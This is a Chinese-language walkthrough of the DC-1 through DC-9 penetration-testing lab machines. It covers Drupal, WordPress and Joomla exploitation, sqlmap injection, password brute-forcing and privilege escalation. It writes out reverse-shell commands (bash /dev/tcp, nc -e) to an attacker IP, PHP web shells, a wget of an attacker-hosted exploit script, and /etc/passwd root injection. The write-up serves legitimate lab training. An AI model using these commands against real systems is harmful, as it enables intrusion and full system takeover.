DC1~9靶机渗透测试实战解析

DC-1靶机渗透

信息收集

1. 使用nmap扫描靶机IP和开放端口：

   nmap -A 192.168.193.135
   

   发现开放22(SSH)、80(HTTP)和111(RPC)端口

2. Web应用识别为Drupal CMS

漏洞利用

1. 使用Metasploit利用Drupal漏洞：

   search drupal
   use exploit/unix/webapp/drupal_drupalgeddon2
   set RHOSTS http://192.168.193.135/
   exploit
   

2. 获取初始shell后升级为交互式shell：

   python -c 'import pty;pty.spawn("/bin/sh")'
   

权限提升

1. 查找配置文件获取数据库凭据：

   cat /var/www/sites/default/settings.php
   

2. 访问MySQL数据库：

   mysql -udbuser -pR0ck3t
   use drupaldb;
   select * from users;
   

3. 生成Drupal密码hash并更新管理员密码：

   cd /var/www/
   php scripts/password-hash.sh admin
   update users set pass='$S$DeJENChbGzXmqiWHeWP15OhPLXcZersPejLwZRC4T5iGDAG5WgwM' where name='admin';
   

4. 使用SUID提权：

   find / -perm -u=s -type f 2>/dev/null
   /usr/bin/find ./aaa -exec '/bin/sh' \;
   

DC-2靶机渗透

信息收集

1. 修改hosts文件添加解析：

   echo "192.168.x.x dc-2" >> /etc/hosts
   

2. 识别为WordPress站点

密码爆破

1. 使用cewl生成密码字典：

   cewl http://dc-2/index.php/flag/ -w pass.txt
   

2. 枚举WordPress用户：

   wpscan --url http://dc-2 -e u
   

3. 爆破用户密码：

   wpscan --url http://dc-2 -U users.txt -P pass.txt
   

SSH登录与rbash逃逸

1. 登录后受限rbash环境，使用vi逃逸：

   vi
   :set shell=/bin/bash
   :shell
   export PATH=$PATH:/bin/
   export PATH=$PATH:/usr/bin/
   

2. 切换用户：

   su jerry
   password: adipiscing
   

Git提权

1. 检查sudo权限：

   sudo -l
   

2. 利用Git提权：

   sudo git help config
   !/bin/bash
   

DC-3靶机渗透

信息收集

1. 识别为Joomla 3.7.0

SQL注入利用

1. 使用sqlmap自动化注入：

   sqlmap -u "http://192.168.193.137/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --batch
   

2. 获取管理员hash并破解：

   john --wordlist=/usr/share/wordlists/rockyou.txt admin_hash.txt
   

文件上传与反弹shell

1. 上传PHP webshell：

   <?php system("bash -c 'bash -i >& /dev/tcp/192.168.193.128/55555 0>&1'");?>
   

2. 内核提权：

   searchsploit Linux 3.16.0
   

DC-4靶机渗透

Web登录爆破

1. 爆破admin密码成功：admin:happy

命令执行与提权

1. 通过命令执行反弹shell：

   nc 192.168.193.128 4444 -e /bin/bash
   

2. 邮件系统发现密码：

   cat /var/spool/mail/charles
   

3. 使用teehee提权：

   echo "hack::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
   

DC-5靶机渗透

文件包含与日志污染

1. 包含nginx日志文件：

   /var/log/nginx/error.log
   

2. 写入PHP代码：

   <?php system($_GET['cmd']);?>
   

Screen提权

1. 利用screen 4.5.0漏洞：

   cd /tmp
   wget http://attacker/exploit.sh
   chmod +x exploit.sh
   ./exploit.sh
   

DC-6靶机渗透

WordPress爆破

1. 使用wpscan爆破：

   wpscan --url "http://wordy/" -U dc-6.txt -P passwd.txt
   

命令执行与提权

1. 通过后台命令执行反弹shell

2. 利用nmap提权：

   echo 'os.execute("/bin/sh")' > shell.sh
   sudo nmap --script=shell.sh
   

DC-7靶机渗透

GitHub信息泄露

1. 发现数据库凭据在GitHub

2. SSH登录：

   ssh dc7user -p 22
   password: MdR3xOgB7#dW
   

Drush密码重置

1. 使用drush重置管理员密码：

   drush user-password admin --password="admin"
   

定时任务提权

1. 写入反弹shell到定时脚本：

   echo "nc -e /bin/bash 192.168.193.128 4444" >> /opt/scripts/backups.sh
   

DC-8靶机渗透

SQL注入

1. 使用sqlmap获取凭据：

   sqlmap -u "http://192.168.193.143/?nid=1" --batch --dbs -D d7db --tables -T users --columns —C name pass -dump
   

Exim提权

1. 利用exim 4.89漏洞：

   ./46996.sh -m netcat
   

DC-9靶机渗透

SQL注入与密码破解

1. 获取Staff数据库凭据

2. 使用john破解：

   john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
   

端口敲门

1. 按顺序扫描特定端口激活SSH：

   nmap -p 7469 192.168.193.144
   nmap -p 8475 192.168.193.144
   nmap -p 9842 192.168.193.144
   

密码文件注入

1. 生成加密密码：

   openssl passwd -1 -salt dc 123456
   

2. 添加root用户：

   echo 'dc:$1$dc$5uDk4oYnRiBs0fFGlcRwy.:0:0:root:/bin/bash' >> /tmp/dc
   sudo /opt/devstuff/dist/test/test /tmp/dc /etc/passwd
   su dc
   password: 123456
   

总结

本系列靶机涵盖了多种渗透测试技术：

1. CMS漏洞利用(Drupal, WordPress, Joomla)
2. Web漏洞(SQL注入、文件包含、日志污染)
3. 密码爆破与哈希破解
4. 权限提升技术(SUID、内核漏洞、定时任务)
5. 受限环境逃逸(rbash)
6. 服务配置漏洞利用(Exim, Screen)
7. 隐蔽通道(端口敲门)

每种技术都需要根据目标环境灵活应用，渗透测试过程中要注重信息收集和权限维持。